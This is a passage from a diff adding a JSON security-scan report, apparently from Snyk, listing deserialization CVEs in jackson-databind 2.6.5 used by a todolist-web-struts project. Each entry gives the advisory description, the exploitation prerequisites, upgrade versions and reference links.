Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-17267) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-17531) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n# References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-20330) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-8840) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-9546,CVE-2020-9547,CVE-2020-9548) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14892,CVE-2019-14893) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10673) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10672) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "shortDescription": { + 